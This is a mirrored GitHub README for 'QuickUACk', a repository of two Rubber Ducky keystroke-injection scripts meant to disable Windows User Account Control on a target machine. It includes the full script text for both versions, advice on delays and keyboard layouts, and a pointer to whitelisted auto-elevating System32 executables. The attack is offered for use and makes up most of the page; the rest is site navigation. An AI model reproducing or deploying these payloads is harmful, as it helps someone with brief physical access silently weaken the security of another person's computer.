GithubHelp home page GithubHelp logo

jonnybanana / quickuack Goto Github PK

View Code? Open in Web Editor NEW
30.0 5.0 13.0 128 KB

:baby_chick: Some of my antiUAC Scripts for Rubbber Ducky :baby_chick:

rubber-ducky rubber-ducky-script uac uac-bypass disable-uac user-account-control windows-exploitation

quickuack's Introduction

QuickUACk!

Some of my antiUAC Scripts for Rubbber Ducky.


alt text


A pair of fast solutions to disable UAC (User Account Control)
it works on all windows version 32 and 64 bits with uac (Vista or Earlier)
and are valid for all languages (Latin, of course).

The scripts were created with the Italian keyboard,
so I do not exclude that in some cases they require minor adjustments.
if the target machine is old, I recommend extending the delay time.


Ver 1.0 uses a .exe application from the C: \ Windows \ System32 (system protected) folder,
to start the uac on-screen control and switch to the uac panel.
the C: \ Windows \ SysWOW64 folder for the purpose or other protected system folders that contain exe are also fine.
Several applications contained in System32 are good, but be careful because there are some exceptions.
You can consult this list to see the applications that are whitelisted by default on W7
and therefore do not require uac checking to be performed:

https://books.google.it/books?id=1EXt2U84WZ0C&pg=PA278&lpg=PA278&dq=AdapterTroubleshooter.exe&source=bl&ots=sWxJuFdZdU&sig=OhOUJ9gzJxfLb4jlJPiuZyP2F-U&hl=it&sa=X&ved=0ahUKEwi37qe0_fvaAhWMyqYKHWz8CWQQ6AEIcDAN#v=onepage&q=AdapterTroubleshooter.exe&f=false


alt text


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

QuickUACk Ver. 1.0

DELAY 2000
CTRL ESC
DELAY 200
REM C:\Windows\System32\AdapterTroubleshooter.exe"
REM work on windows version 32 and 64 bit (Vista or Earlier)
REM no reboot is required for disabling
STRING AdapterTroubleshooter
DELAY 200
ENTER
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
LEFTARROW
DELAY 200
ENTER

-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-

QuickUACk Ver. 2.0

DELAY 2000
CTRL ESC
DELAY 200
REM opens directly the User Account Control Panel
REM work on all windows version 32 and 64 bit with uac (Vista or Earlier)
REM no reboot is required for disabling
STRING UAC
DELAY 200
ENTER
DELAY 200
LEFTARROW
DELAY 200
ENTER
DELAY 200
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
LEFTARROW
DELAY 200
ENTER


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@



Best VPN

quickuack's People

Contributors

jonnybanana avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.